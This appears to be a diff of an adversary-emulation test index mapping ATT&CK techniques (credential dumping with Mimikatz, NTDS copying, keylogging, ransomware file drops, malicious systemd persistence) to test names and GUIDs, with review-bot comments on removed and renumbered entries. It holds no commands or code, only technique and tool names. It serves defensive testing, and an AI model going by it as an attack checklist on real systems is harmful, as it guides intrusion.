command-and-control,T1132.001,Data Encoding: Standard Encoding,2,Base64 Encoded data (freebsd),2d97c626-7652-449e-a986-b02d9051c298,sh
command-and-control,T1132.001,Data Encoding: Standard Encoding,3,XOR Encoded data.,c3ed6d2a-e3ad-400d-ad78-bbfdbfeacc08,powershell
command-and-control,T1568.002,Dynamic Resolution: Domain Generation Algorithms,1,DGA Simulation (Python),cc367493-3a00-4c4a-a685-16b73339167c,bash
command-and-control,T1071.004,Application Layer Protocol: DNS,1,DNS Large Query Volume,1700f5d6-5a44-487b-84de-bc66f507b0a6,powershell
command-and-control,T1071.004,Application Layer Protocol: DNS,2,DNS Regular Beaconing,3efc144e-1af8-46bb-8ca2-1376bb6db8b6,powershell
command-and-control,T1071.004,Application Layer Protocol: DNS,3,DNS Long Domain Query,fef31710-223a-40ee-8462-a396d6b66978,powershell
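Review bot: removing "DGA Simulation (Python)" (cc367493-3a00-4c4a-a685-16b73339167c) removes the only test listed for T1568.002, so "Dynamic Resolution: Domain Generation Algorithms" no longer appears in the index at all. A single-test technique disappearing is easy to miss inside a 55-line deletion; confirm it was intended.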
@@ -1500,8 +1472,6 @@ command-and-control,T1219,Remote Access Software,12,RustDesk Files Detected Test
command-and-control,T1219,Remote Access Software,13,Splashtop Execution,b025c580-029e-4023-888d-a42710d76934,powershell
command-and-control,T1219,Remote Access Software,14,Splashtop Streamer Execution,3e1858ee-3550-401c-86ec-5e70ed79295b,powershell
command-and-control,T1219,Remote Access Software,15,Microsoft App Quick Assist Execution,1aea6d15-70f1-4b4e-8b02-397b5d5ffe75,powershell
command-and-control,T1659,Content Injection,1,MITM Proxy Injection,9b360eaf-c778-4f07-a6e7-895c4f01ac1c,bash
command-and-control,T1659,Content Injection,2,MITM Proxy Injection (Windows),dcc2ca85-a21c-43a4-acc7-7314d4e5891c,powershell
command-and-control,T1572,Protocol Tunneling,1,DNS over HTTPS Large Query Volume,ae9ef4b0-d8c1-49d4-8758-06206f19af0a,powershell
command-and-control,T1572,Protocol Tunneling,2,DNS over HTTPS Regular Beaconing,0c5f9705-c575-42a6-9609-cbbff4b2fc9b,powershell
command-and-control,T1572,Protocol Tunneling,3,DNS over HTTPS Long Domain Query,748a73d5-cea4-4f34-84d8-839da5baa99c,powershell
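Review bot: both T1659 "Content Injection" rows (9b360eaf-c778-4f07-a6e7-895c4f01ac1c, bash, and dcc2ca85-a21c-43a4-acc7-7314d4e5891c, powershell) are dropped from command-and-control, and the same two GUIDs are dropped from initial-access at the end of the diff, so the technique is removed from the index entirely. If T1659 is being retired, state it; if the entries were lost by the tool, this hunk and the initial-access one should be reverted together so the two tactic sections stay consistent.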
@@ -1589,7 +1559,6 @@ collection,T1113,Screen Capture,6,Capture Linux Desktop using Import Tool (freeb
collection,T1113,Screen Capture,7,Windows Screencapture,3c898f62-626c-47d5-aad2-6de873d69153,powershell
collection,T1113,Screen Capture,8,Windows Screen Capture (CopyFromScreen),e9313014-985a-48ef-80d9-cde604ffc187,powershell
collection,T1113,Screen Capture,9,Windows Recall Feature Enabled - DisableAIDataAnalysis Value Deleted,5a496325-0115-4274-8eb9-755b649ad0fb,powershell
collection,T1113,Screen Capture,10,RDP Bitmap Cache Extraction via bmc-tools,98f19852-7348-4f99-9e15-6ff4320464c7,powershell
collection,T1056.001,Input Capture: Keylogging,1,Input Capture,d9b633ca-8efb-45e6-b838-70f595c6ae26,powershell
collection,T1056.001,Input Capture: Keylogging,2,Living off the land Terminal Input Capture on Linux with pam.d,9c6bdb34-a89f-4b90-acb1-5970614c711b,sh
collection,T1056.001,Input Capture: Keylogging,3,Logging bash history to syslog,0e59d59d-3265-4d35-bebd-bf5c1ec40db5,sh
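Review bot: T1113 test 10, "RDP Bitmap Cache Extraction via bmc-tools" (98f19852-7348-4f99-9e15-6ff4320464c7), is dropped while tests 7, 8 and 9 remain. No renumbering is needed since it was last, but please confirm the atomic was removed on purpose rather than skipped.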
@@ -1850,7 +1819,6 @@ credential-access,T1003.008,"OS Credential Dumping: /etc/passwd, /etc/master.pas
credential-access,T1558.002,Steal or Forge Kerberos Tickets: Silver Ticket,1,Crafting Active Directory silver tickets with mimikatz,385e59aa-113e-4711-84d9-f637aef01f2c,powershell
credential-access,T1555.004,Credentials from Password Stores: Windows Credential Manager,1,Access Saved Credentials via VaultCmd,9c2dd36d-5c8b-4b29-8d72-a11b0d5d7439,command_prompt
credential-access,T1555.004,Credentials from Password Stores: Windows Credential Manager,2,WinPwn - Loot local Credentials - Invoke-WCMDump,fa714db1-63dd-479e-a58e-7b2b52ca5997,powershell
credential-access,T1556.001,Modify Authentication Process: Domain Controller Authentication,1,Skeleton Key via Mimikatz,0ee8081f-e9a7-4a2e-a23f-68473023184f,powershell
credential-access,T1003.003,OS Credential Dumping: NTDS,1,Create Volume Shadow Copy with vssadmin,dcebead7-6c28-4b4b-bf3c-79deb1b1fc7f,command_prompt
credential-access,T1003.003,OS Credential Dumping: NTDS,2,Copy NTDS.dit from Volume Shadow Copy,c6237146-9ea6-4711-85c9-c56d263a6b03,command_prompt
credential-access,T1003.003,OS Credential Dumping: NTDS,3,Dump Active Directory Database with NTDSUtil,2364e33d-ceab-4641-8468-bfb1d7cc2723,command_prompt
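Review bot: the credential-access entry for "Skeleton Key via Mimikatz" (0ee8081f-e9a7-4a2e-a23f-68473023184f) is removed, consistent with the defense-evasion and persistence removals of the same GUID elsewhere in this diff. Since the technique is multi-tactic, verify all three removals are intentional as a set; reverting only one would leave the index inconsistent across tactics.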
@@ -1860,8 +1828,6 @@ credential-access,T1003.003,OS Credential Dumping: NTDS,6,Create Volume Shadow C
credential-access,T1003.003,OS Credential Dumping: NTDS,7,Create Volume Shadow Copy with Powershell,542bb97e-da53-436b-8e43-e0a7d31a6c24,powershell
credential-access,T1003.003,OS Credential Dumping: NTDS,8,Create Symlink to Volume Shadow Copy,21748c28-2793-4284-9e07-d6d028b66702,command_prompt
credential-access,T1003.003,OS Credential Dumping: NTDS,9,Create Volume Shadow Copy with diskshadow,b385996c-0e7d-4e27-95a4-aca046b119a7,command_prompt
credential-access,T1003.003,OS Credential Dumping: NTDS,10,Copy NTDS in low level NTFS acquisition via MFT parsing,f57cb283-c131-4e2f-8a6c-363d575748b2,powershell
credential-access,T1003.003,OS Credential Dumping: NTDS,11,Copy NTDS in low level NTFS acquisition via fsutil,c7be89f7-5d06-4321-9f90-8676a77e0502,powershell
credential-access,T1558.003,Steal or Forge Kerberos Tickets: Kerberoasting,1,Request for service tickets,3f987809-3681-43c8-bcd8-b3ff3a28533a,powershell
credential-access,T1558.003,Steal or Forge Kerberos Tickets: Kerberoasting,2,Rubeus kerberoast,14625569-6def-4497-99ac-8e7817105b55,powershell
credential-access,T1558.003,Steal or Forge Kerberos Tickets: Kerberoasting,3,Extract all accounts in use as SPN using setspn,e6f4affd-d826-4871-9a62-6c9004b8fe06,command_prompt
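Review bot: T1003.003 loses tests 10 and 11 ("Copy NTDS in low level NTFS acquisition via MFT parsing", f57cb283-c131-4e2f-8a6c-363d575748b2, and "Copy NTDS in low level NTFS acquisition via fsutil", c7be89f7-5d06-4321-9f90-8676a77e0502), both powershell. Tests 1 through 9 are untouched, so no renumbering, but two adjacent tests of the same technique vanishing at once should be checked against the technique's YAML rather than assumed to be deliberate.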
@@ -1895,10 +1861,6 @@ discovery,T1615,Group Policy Discovery,3,WinPwn - GPOAudit,bc25c04b-841e-4965-85
discovery,T1615,Group Policy Discovery,4,WinPwn - GPORemoteAccessPolicy,7230d01a-0a72-4bd5-9d7f-c6d472bc6a59,powershell
discovery,T1615,Group Policy Discovery,5,MSFT Get-GPO Cmdlet,52778a8f-a10b-41a4-9eae-52ddb74072bf,powershell
discovery,T1652,Device Driver Discovery,1,Device Driver Discovery,235b30a2-e5b1-441f-9705-be6231c88ddd,powershell
discovery,T1652,Device Driver Discovery,2,Device Driver Discovery (Linux),d57dfc9e-ed9a-418e-88f8-b59c85f8cfd1,bash
discovery,T1652,Device Driver Discovery,3,Enumerate Kernel Driver Files (Linux),13c0fef5-9be9-4d7f-9c6b-901624e53770,bash
discovery,T1652,Device Driver Discovery,4,List loaded kernel extensions (macOS),71eab73d-5d7d-4681-9a72-7873489a5b85,bash
discovery,T1652,Device Driver Discovery,5,Find Kernel Extensions (macOS),c63bbe52-6f17-4832-b221-f07ba8b1736f,bash
discovery,T1087.002,Account Discovery: Domain Account,1,Enumerate all accounts (Domain),6fbc9e68-5ad7-444a-bd11-8bf3136c477e,command_prompt
discovery,T1087.002,Account Discovery: Domain Account,2,Enumerate all accounts via PowerShell (Domain),8b8a6449-be98-4f42-afd2-dedddc7453b2,powershell
discovery,T1087.002,Account Discovery: Domain Account,3,Enumerate logged on users via CMD (Domain),161dcd85-d014-4f5e-900c-d3eaae82a0f7,command_prompt
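Review bot: T1652 "Device Driver Discovery" keeps only its Windows test 1 (235b30a2-e5b1-441f-9705-be6231c88ddd); the Linux and macOS tests 2 through 5 (d57dfc9e-ed9a-418e-88f8-b59c85f8cfd1, 13c0fef5-9be9-4d7f-9c6b-901624e53770, 71eab73d-5d7d-4681-9a72-7873489a5b85, c63bbe52-6f17-4832-b221-f07ba8b1736f) are all dropped. The removal is platform-shaped (every bash test goes, the powershell one stays), which is worth checking: if the tool that builds this index is skipping tests on some platform or executor criterion, that would explain the loss and needs fixing at the source.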
@@ -1961,10 +1923,6 @@ discovery,T1007,System Service Discovery,1,System Service Discovery,89676ba1-b1f
discovery,T1007,System Service Discovery,2,System Service Discovery - net.exe,5f864a3f-8ce9-45c0-812c-bdf7d8aeacc3,command_prompt
discovery,T1007,System Service Discovery,3,System Service Discovery - systemctl/service,f4b26bce-4c2c-46c0-bcc5-fce062d38bef,bash
discovery,T1007,System Service Discovery,4,Get-Service Execution,51f17016-d8fa-4360-888a-df4bf92c4a04,command_prompt
discovery,T1007,System Service Discovery,5,System Service Discovery - macOS launchctl,9b378962-a75e-4856-b117-2503d6dcebba,sh
discovery,T1007,System Service Discovery,6,System Service Discovery - Windows Scheduled Tasks (schtasks),7cd7eaa3-9ccc-460d-96d2-c6fb13e6d58a,command_prompt
discovery,T1007,System Service Discovery,7,System Service Discovery - Services Registry Enumeration,d70d82bd-bb00-4837-b146-b40d025551b2,powershell
discovery,T1007,System Service Discovery,8,System Service Discovery - Linux init scripts,8f2a5d2b-4018-46d4-8f3f-0fea53754690,sh
discovery,T1040,Network Sniffing,1,Packet Capture Linux using tshark or tcpdump,7fe741f7-b265-4951-a7c7-320889083b3e,bash
discovery,T1040,Network Sniffing,2,Packet Capture FreeBSD using tshark or tcpdump,c93f2492-9ebe-44b5-8b45-36574cccfe67,sh
discovery,T1040,Network Sniffing,3,Packet Capture macOS using tcpdump or tshark,9d04efee-eff5-4240-b8d2-07792b873608,bash
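Review bot: T1007 "System Service Discovery" drops tests 5 through 8 (9b378962-a75e-4856-b117-2503d6dcebba, 7cd7eaa3-9ccc-460d-96d2-c6fb13e6d58a, d70d82bd-bb00-4837-b146-b40d025551b2, 8f2a5d2b-4018-46d4-8f3f-0fea53754690), covering macOS launchctl, Windows scheduled tasks, the Services registry and Linux init scripts, and keeps only tests 1 through 4. Four consecutive highest-numbered tests disappearing suggests either the index was built from an older copy of the technique or the newest tests were not picked up; confirm which before merging.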
@@ -2081,11 +2039,8 @@ discovery,T1083,File and Directory Discovery,8,Identifying Network Shares - Linu
discovery,T1083,File and Directory Discovery,9,Recursive Enumerate Files And Directories By Powershell,95a21323-770d-434c-80cd-6f6fbf7af432,powershell
discovery,T1049,System Network Connections Discovery,1,System Network Connections Discovery,0940a971-809a-48f1-9c4d-b1d785e96ee5,command_prompt
discovery,T1049,System Network Connections Discovery,2,System Network Connections Discovery with PowerShell,f069f0f1-baad-4831-aa2b-eddac4baac4a,powershell
discovery,T1049,System Network Connections Discovery,3,System Network Connections Discovery via PowerShell (Process Mapping),b52c8233-8f71-4bd7-9928-49fec8215cf5,powershell
discovery,T1049,System Network Connections Discovery,4,System Network Connections Discovery via ss or lsof (Linux/MacOS),bcf05343-ef1d-4052-8a27-b00c9be42b9f,bash
discovery,T1049,System Network Connections Discovery,5,"System Network Connections Discovery FreeBSD, Linux & MacOS",9ae28d3f-190f-4fa0-b023-c7bd3e0eabf2,sh
discovery,T1049,System Network Connections Discovery,6,"System Network Connections Discovery via sockstat (Linux, FreeBSD)",997bb0a6-421e-40c7-b5d2-0f493904ef9b,sh
discovery,T1049,System Network Connections Discovery,7,System Discovery using SharpView,96f974bb-a0da-4d87-a744-ff33e73367e9,powershell
discovery,T1049,System Network Connections Discovery,3,"System Network Connections Discovery FreeBSD, Linux & MacOS",9ae28d3f-190f-4fa0-b023-c7bd3e0eabf2,sh
discovery,T1049,System Network Connections Discovery,4,System Discovery using SharpView,96f974bb-a0da-4d87-a744-ff33e73367e9,powershell
discovery,T1619,Cloud Storage Object Discovery,1,AWS S3 Enumeration,3c7094f8-71ec-4917-aeb8-a633d7ec4ef5,sh
discovery,T1619,Cloud Storage Object Discovery,2,Azure - Enumerate Storage Account Objects via Shared Key authorization using Azure CLI,070322a4-2c60-4c50-8ffb-c450a34fe7bf,powershell
discovery,T1619,Cloud Storage Object Discovery,3,Azure - Scan for Anonymous Access to Azure Storage (Powershell),146af1f1-b74e-4aa7-9895-505eb559b4b0,powershell
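Review bot: three T1049 tests are removed ("via PowerShell (Process Mapping)", b52c8233-8f71-4bd7-9928-49fec8215cf5; "via ss or lsof (Linux/MacOS)", bcf05343-ef1d-4052-8a27-b00c9be42b9f; "via sockstat (Linux, FreeBSD)", 997bb0a6-421e-40c7-b5d2-0f493904ef9b) and the two survivors are renumbered: "System Network Connections Discovery FreeBSD, Linux & MacOS" (9ae28d3f-190f-4fa0-b023-c7bd3e0eabf2) moves from test 5 to test 3 and "System Discovery using SharpView" (96f974bb-a0da-4d87-a744-ff33e73367e9) from test 7 to test 4. The GUIDs are unchanged, so GUID-based references survive, but any reference by technique plus test number now resolves to a different atomic or to nothing; treat the renumbering as a breaking change for such consumers.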
@@ -2232,7 +2187,6 @@ impact,T1486,Data Encrypted for Impact,8,Data Encrypted with GPG4Win,4541e2c2-33
impact,T1486,Data Encrypted for Impact,9,Data Encrypt Using DiskCryptor,44b68e11-9da2-4d45-a0d9-893dabd60f30,command_prompt
impact,T1486,Data Encrypted for Impact,10,Akira Ransomware drop Files with .akira Extension and Ransomnote,ab3f793f-2dcc-4da5-9c71-34988307263f,powershell
impact,T1496,Resource Hijacking,1,FreeBSD/macOS/Linux - Simulate CPU Load with Yes,904a5a0e-fb02-490d-9f8d-0e256eb37549,sh
impact,T1496,Resource Hijacking,2,Windows - Simulate CPU Load with PowerShell,44315fb0-f78d-4cef-b10f-cf21c1fe2c75,powershell
impact,T1485,Data Destruction,1,Windows - Overwrite file with SysInternals SDelete,476419b5-aebf-4366-a131-ae3e8dae5fc2,powershell
impact,T1485,Data Destruction,2,FreeBSD/macOS/Linux - Overwrite file with DD,38deee99-fd65-4031-bec8-bfa4f9f26146,sh
impact,T1485,Data Destruction,3,Overwrite deleted data on C drive,321fd25e-0007-417f-adec-33232252be19,command_prompt
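Review bot: T1496 "Resource Hijacking" loses its only Windows test, "Windows - Simulate CPU Load with PowerShell" (44315fb0-f78d-4cef-b10f-cf21c1fe2c75), leaving just the FreeBSD/macOS/Linux one. Confirm the removal is intentional; with it gone the technique has no Windows coverage in this index.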
@@ -2250,7 +2204,6 @@ impact,T1490,Inhibit System Recovery,9,Disable System Restore Through Registry,6
impact,T1490,Inhibit System Recovery,10,Windows - vssadmin Resize Shadowstorage Volume,da558b07-69ae-41b9-b9d4-4d98154a7049,powershell
impact,T1490,Inhibit System Recovery,11,Modify VSS Service Permissions,a4420f93-5386-4290-b780-f4f66abc7070,command_prompt
impact,T1490,Inhibit System Recovery,12,Disable Time Machine,ed952f70-91d4-445a-b7ff-30966bfb1aff,sh
impact,T1490,Inhibit System Recovery,13,Windows - Delete Volume Shadow Copies via Diskshadow,42111a6f-7e7f-482c-9b1b-3cfd090b999c,powershell
impact,T1529,System Shutdown/Reboot,1,Shutdown System - Windows,ad254fa8-45c0-403b-8c77-e00b3d3e7a64,command_prompt
impact,T1529,System Shutdown/Reboot,2,Restart System - Windows,f4648f0d-bf78-483c-bafc-3ec99cd1c302,command_prompt
impact,T1529,System Shutdown/Reboot,3,Restart System via `shutdown` - FreeBSD/macOS/Linux,6326dbc4-444b-4c04-88f4-27e94d0327cb,sh
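Review bot: T1490 test 13, "Windows - Delete Volume Shadow Copies via Diskshadow" (42111a6f-7e7f-482c-9b1b-3cfd090b999c), is dropped while tests 10 through 12 stay. It is the last test of the technique so numbering is unaffected, but the removal needs the same confirmation as the other deletions in this change.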
@@ -2273,8 +2226,6 @@ initial-access,T1566.001,Phishing: Spearphishing Attachment,1,Download Macro-Ena
initial-access,T1566.001,Phishing: Spearphishing Attachment,2,Word spawned a command shell and used an IP address in the command line,cbb6799a-425c-4f83-9194-5447a909d67f,powershell
initial-access,T1091,Replication Through Removable Media,1,USB Malware Spread Simulation,d44b7297-622c-4be8-ad88-ec40d7563c75,powershell
initial-access,T1195,Supply Chain Compromise,1,Octopus Scanner Malware Open Source Supply Chain,82a9f001-94c5-495e-9ed5-f530dbded5e2,command_prompt
initial-access,T1659,Content Injection,1,MITM Proxy Injection,9b360eaf-c778-4f07-a6e7-895c4f01ac1c,bash
initial-access,T1659,Content Injection,2,MITM Proxy Injection (Windows),dcc2ca85-a21c-43a4-acc7-7314d4e5891c,powershell
initial-access,T1078.001,Valid Accounts: Default Accounts,1,Enable Guest account with RDP capability and admin privileges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt
initial-access,T1078.001,Valid Accounts: Default Accounts,2,Activate Guest Account,aa6cb8c4-b582-4f8e-b677-37733914abda,command_prompt
initial-access,T1078.001,Valid Accounts: Default Accounts,3,Enable Guest Account on macOS,0315bdff-4178-47e9-81e4-f31a6d23f7e4,sh
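Review bot: the two T1659 "Content Injection" rows (9b360eaf-c778-4f07-a6e7-895c4f01ac1c, dcc2ca85-a21c-43a4-acc7-7314d4e5891c) are removed from initial-access, mirroring their removal from command-and-control earlier in the diff; with both gone the technique is absent from the index. Keep or revert the two hunks together so the tactic sections do not diverge.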
932 privilege-escalation T1543.001 Create or Modify System Process: Launch Agent 1 Launch Agent a5983dee-bf6c-4eaf-951c-dbc1a7b90900 bash
1024 execution T1106 Native API 4 WinPwn - Get SYSTEM shell - Pop System Shell using NamedPipe Impersonation technique e1f93a06-1649-4f07-89a8-f57279a7d60e powershell
1025 execution T1106 Native API 5 Run Shellcode via Syscall in Go ae56083f-28d0-417d-84da-df4242da1f7c powershell
1026 execution T1059.010 Command and Scripting Interpreter: AutoHotKey & AutoIT 1 AutoHotKey script execution 7b5d350e-f758-43cc-a761-8e3f6b052a03 powershell
execution T1569.003 System Services: Systemctl 1 Create and Enable a Malicious systemd Service Unit e58c8723-5503-4533-b642-535cd20ec648 sh
execution T1569.003 System Services: Systemctl 2 Create systemd Service Unit from /tmp (Unusual Location) a1fa406e-2354-4a24-b6d6-94157e7564d4 sh
execution T1569.003 System Services: Systemctl 3 Create systemd Service Unit from /dev/shm (Unusual Location) dce49381-a26b-4d95-bdfa-c607ffe8bee5 sh
execution T1569.003 System Services: Systemctl 4 Modify Existing systemd Service to Execute Malicious Command 6123928f-6389-4914-8d25-a5d69bd657fa sh
execution T1569.003 System Services: Systemctl 5 Execute Command via Transient systemd Service (systemd-run) a73a886f-23c5-4e8f-b1ab-b1bbc1f5e236 sh
execution T1569.003 System Services: Systemctl 6 Enumerate All systemd Services Using systemctl 1e5be8d4-605a-4acb-8709-2f80b2d8ea95 sh
execution T1569.003 System Services: Systemctl 7 Enable systemd Service for Persistence with Auto-Restart 2fc6c0ab-4f88-4eb8-ab1b-f739fc22bba7 sh
execution T1569.003 System Services: Systemctl 8 Masquerade Malicious Service as Legitimate System Service 6fec8560-ff64-4bbf-bc79-734fea48f7ca sh
1027 execution T1610 Deploy a container 1 Deploy Docker container 59aa6f26-7620-417e-9318-589e0fb7a372 bash
1028 execution T1059 Command and Scripting Interpreter 1 AutoIt Script Execution a9b93f17-31cb-435d-a462-5e838a2a6026 powershell
1029 execution T1609 Kubernetes Exec Into Container 1 ExecIntoContainer d03bfcd3-ed87-49c8-8880-44bb772dea4b bash
1165 persistence T1505.005 Server Software Component: Terminal Services DLL 1 Simulate Patching termsrv.dll 0b2eadeb-4a64-4449-9d43-3d999f4a317b powershell
1166 persistence T1505.005 Server Software Component: Terminal Services DLL 2 Modify Terminal Services DLL Path 18136e38-0530-49b2-b309-eed173787471 powershell
1167 persistence T1176 Browser Extensions 1 Chrome/Chromium (Developer Mode) 3ecd790d-2617-4abf-9a8c-4e8d47da9ee1 manual
1168 persistence T1176 Browser Extensions 2 Firefox Chrome/Chromium (Chrome Web Store) cb790029-17e6-4c43-b96f-002ce5f10938 4c83940d-8ca5-4bb2-8100-f46dc914bc3f manual
1169 persistence T1176 Browser Extensions 3 Edge Chromium Addon - VPN Firefox 3d456e2b-a7db-4af8-b5b3-720e7c4d9da5 cb790029-17e6-4c43-b96f-002ce5f10938 manual
1170 persistence T1176 Browser Extensions 4 Google Chrome Load Unpacked Extension With Command Line Edge Chromium Addon - VPN 7a714703-9f6b-461c-b06d-e6aeac650f27 3d456e2b-a7db-4af8-b5b3-720e7c4d9da5 powershell manual
1171 persistence T1137.005 T1176 Office Application Startup: Outlook Rules Browser Extensions 1 5 Outlook Rule - Subject Trigger with DeletePermanently Action via COM Object Google Chrome Load Unpacked Extension With Command Line ffadc988-b682-4a68-bd7e-4803666be637 7a714703-9f6b-461c-b06d-e6aeac650f27 powershell
persistence T1137.005 Office Application Startup: Outlook Rules 2 Outlook Rule - Sender Address Trigger with DeletePermanently Action via COM Object bddfd8d4-7687-4971-b611-50a537ab3ab4 powershell
persistence T1137.005 Office Application Startup: Outlook Rules 3 Outlook Rule - Auto-Forward Emails to External Address via COM Object b0bd3d76-a57c-4699-83f4-8cd798dd09bd powershell
persistence T1137.005 Office Application Startup: Outlook Rules 4 Outlook Rules - Enumerate Existing Rules via PowerShell COM Object 5ff5249a-5807-480e-ab52-c430497a8a25 powershell
persistence T1137.005 Office Application Startup: Outlook Rules 5 Outlook Rule - Create Rule with Obfuscated Blank Name (MAPI Evasion) cb814cf8-24f2-41dc-a1cd-1c2073276d4a powershell
1172 persistence T1546.011 Event Triggered Execution: Application Shimming 1 Application Shim Installation 9ab27e22-ee62-4211-962b-d36d9a0e6a18 command_prompt
1173 persistence T1546.011 Event Triggered Execution: Application Shimming 2 New shim database files created in the default shim database directory aefd6866-d753-431f-a7a4-215ca7e3f13d powershell
1174 persistence T1546.011 Event Triggered Execution: Application Shimming 3 Registry key creation and/or modification events for SDB 9b6a06f9-ab5e-4e8d-8289-1df4289db02f powershell
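Review bot: this T1176/T1137.005 region renumbers the existing T1176 tests (Firefox cb790029-17e6-4c43-b96f-002ce5f10938 moves from 2 to 3, Edge Chromium Addon - VPN from 3 to 4, Google Chrome Load Unpacked Extension from 4 to 5) to insert Chrome/Chromium (Chrome Web Store) 4c83940d-8ca5-4bb2-8100-f46dc914bc3f as test 2, and puts all five T1137.005 Outlook Rules rows (ffadc988-b682-4a68-bd7e-4803666be637 through cb814cf8-24f2-41dc-a1cd-1c2073276d4a) into the changed set. Anyone invoking T1176 by test number now runs a different atomic than before, so the renumbering belongs in the change description; and since the same shape of change in the Linux index below is a straight removal of rows, please confirm the five Outlook Rules tests still appear in the regenerated index.md rather than being dropped by the new generator.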
1404 persistence T1037.005 Boot or Logon Initialization Scripts: Startup Items 1 Add file to Local Library StartupItems 134627c3-75db-410e-bff8-7a920075f198 sh
1405 persistence T1037.005 Boot or Logon Initialization Scripts: Startup Items 2 Add launch script to launch daemon fc369906-90c7-4a15-86fd-d37da624dde6 bash
1406 persistence T1037.005 Boot or Logon Initialization Scripts: Startup Items 3 Add launch script to launch agent 10cf5bec-49dd-4ebf-8077-8f47e420096f bash
persistence T1546.018 Event Triggered Execution: Python Startup Hooks 1 Python Startup Hook - atomic_hook.pth (Windows) 57289962-21dc-4501-b756-80cd30608d9f powershell
persistence T1546.018 Event Triggered Execution: Python Startup Hooks 2 Python Startup Hook - usercustomize.py (Windows) 05cc7a2c-ce32-46f2-a358-f27f76718c39 powershell
persistence T1546.018 Event Triggered Execution: Python Startup Hooks 3 Python Startup Hook - atomic_hook.pth (Linux) a58c066d-f2f0-42a2-ab70-30af73f89e66 sh
persistence T1546.018 Event Triggered Execution: Python Startup Hooks 4 Python Startup Hook - atomic_hook.pth (macOS) 28ca4f81-fa96-47ff-8555-dde98017e89b sh
persistence T1546.018 Event Triggered Execution: Python Startup Hooks 5 Python Startup Hook - usercustomize.py (Linux / MacOS) 6e78084a-a433-4702-a838-cc7b765d87e8 sh
1407 persistence T1197 BITS Jobs 1 Bitsadmin Download (cmd) 3c73d728-75fb-4180-a12f-6712864d7421 command_prompt
1408 persistence T1197 BITS Jobs 2 Bitsadmin Download (PowerShell) f63b8bc4-07e5-4112-acba-56f646f3f0bc powershell
1409 persistence T1197 BITS Jobs 3 Persist, Download, & Execute 62a06ec5-5754-47d2-bcfc-123d8314c6ae command_prompt
1413 persistence T1543.001 Create or Modify System Process: Launch Agent 1 Launch Agent a5983dee-bf6c-4eaf-951c-dbc1a7b90900 bash
1414 persistence T1543.001 Create or Modify System Process: Launch Agent 2 Event Monitor Daemon Persistence 11979f23-9b9d-482a-9935-6fc9cd022c3e bash
1415 persistence T1543.001 Create or Modify System Process: Launch Agent 3 Launch Agent - Root Directory 66774fa8-c562-4bae-a58d-5264a0dd9dd7 bash
persistence T1556.001 Modify Authentication Process: Domain Controller Authentication 1 Skeleton Key via Mimikatz 0ee8081f-e9a7-4a2e-a23f-68473023184f powershell
1416 persistence T1037.004 Boot or Logon Initialization Scripts: Rc.common 1 rc.common 97a48daa-8bca-4bc0-b1a9-c1d163e762de bash
1417 persistence T1037.004 Boot or Logon Initialization Scripts: Rc.common 2 rc.common c33f3d80-5f04-419b-a13a-854d1cbdbf3a bash
1418 persistence T1037.004 Boot or Logon Initialization Scripts: Rc.common 3 rc.local 126f71af-e1c9-405c-94ef-26a47b16c102 sh
1452 command-and-control T1132.001 Data Encoding: Standard Encoding 1 Base64 Encoded data. 1164f70f-9a88-4dff-b9ff-dc70e7bf0c25 sh
1453 command-and-control T1132.001 Data Encoding: Standard Encoding 2 Base64 Encoded data (freebsd) 2d97c626-7652-449e-a986-b02d9051c298 sh
1454 command-and-control T1132.001 Data Encoding: Standard Encoding 3 XOR Encoded data. c3ed6d2a-e3ad-400d-ad78-bbfdbfeacc08 powershell
command-and-control T1568.002 Dynamic Resolution: Domain Generation Algorithms 1 DGA Simulation (Python) cc367493-3a00-4c4a-a685-16b73339167c bash
1455 command-and-control T1071.004 Application Layer Protocol: DNS 1 DNS Large Query Volume 1700f5d6-5a44-487b-84de-bc66f507b0a6 powershell
1456 command-and-control T1071.004 Application Layer Protocol: DNS 2 DNS Regular Beaconing 3efc144e-1af8-46bb-8ca2-1376bb6db8b6 powershell
1457 command-and-control T1071.004 Application Layer Protocol: DNS 3 DNS Long Domain Query fef31710-223a-40ee-8462-a396d6b66978 powershell
1472 command-and-control T1219 Remote Access Software 13 Splashtop Execution b025c580-029e-4023-888d-a42710d76934 powershell
1473 command-and-control T1219 Remote Access Software 14 Splashtop Streamer Execution 3e1858ee-3550-401c-86ec-5e70ed79295b powershell
1474 command-and-control T1219 Remote Access Software 15 Microsoft App Quick Assist Execution 1aea6d15-70f1-4b4e-8b02-397b5d5ffe75 powershell
command-and-control T1659 Content Injection 1 MITM Proxy Injection 9b360eaf-c778-4f07-a6e7-895c4f01ac1c bash
command-and-control T1659 Content Injection 2 MITM Proxy Injection (Windows) dcc2ca85-a21c-43a4-acc7-7314d4e5891c powershell
1475 command-and-control T1572 Protocol Tunneling 1 DNS over HTTPS Large Query Volume ae9ef4b0-d8c1-49d4-8758-06206f19af0a powershell
1476 command-and-control T1572 Protocol Tunneling 2 DNS over HTTPS Regular Beaconing 0c5f9705-c575-42a6-9609-cbbff4b2fc9b powershell
1477 command-and-control T1572 Protocol Tunneling 3 DNS over HTTPS Long Domain Query 748a73d5-cea4-4f34-84d8-839da5baa99c powershell
1559 collection T1113 Screen Capture 7 Windows Screencapture 3c898f62-626c-47d5-aad2-6de873d69153 powershell
1560 collection T1113 Screen Capture 8 Windows Screen Capture (CopyFromScreen) e9313014-985a-48ef-80d9-cde604ffc187 powershell
1561 collection T1113 Screen Capture 9 Windows Recall Feature Enabled - DisableAIDataAnalysis Value Deleted 5a496325-0115-4274-8eb9-755b649ad0fb powershell
collection T1113 Screen Capture 10 RDP Bitmap Cache Extraction via bmc-tools 98f19852-7348-4f99-9e15-6ff4320464c7 powershell
1562 collection T1056.001 Input Capture: Keylogging 1 Input Capture d9b633ca-8efb-45e6-b838-70f595c6ae26 powershell
1563 collection T1056.001 Input Capture: Keylogging 2 Living off the land Terminal Input Capture on Linux with pam.d 9c6bdb34-a89f-4b90-acb1-5970614c711b sh
1564 collection T1056.001 Input Capture: Keylogging 3 Logging bash history to syslog 0e59d59d-3265-4d35-bebd-bf5c1ec40db5 sh
1819 credential-access T1558.002 Steal or Forge Kerberos Tickets: Silver Ticket 1 Crafting Active Directory silver tickets with mimikatz 385e59aa-113e-4711-84d9-f637aef01f2c powershell
1820 credential-access T1555.004 Credentials from Password Stores: Windows Credential Manager 1 Access Saved Credentials via VaultCmd 9c2dd36d-5c8b-4b29-8d72-a11b0d5d7439 command_prompt
1821 credential-access T1555.004 Credentials from Password Stores: Windows Credential Manager 2 WinPwn - Loot local Credentials - Invoke-WCMDump fa714db1-63dd-479e-a58e-7b2b52ca5997 powershell
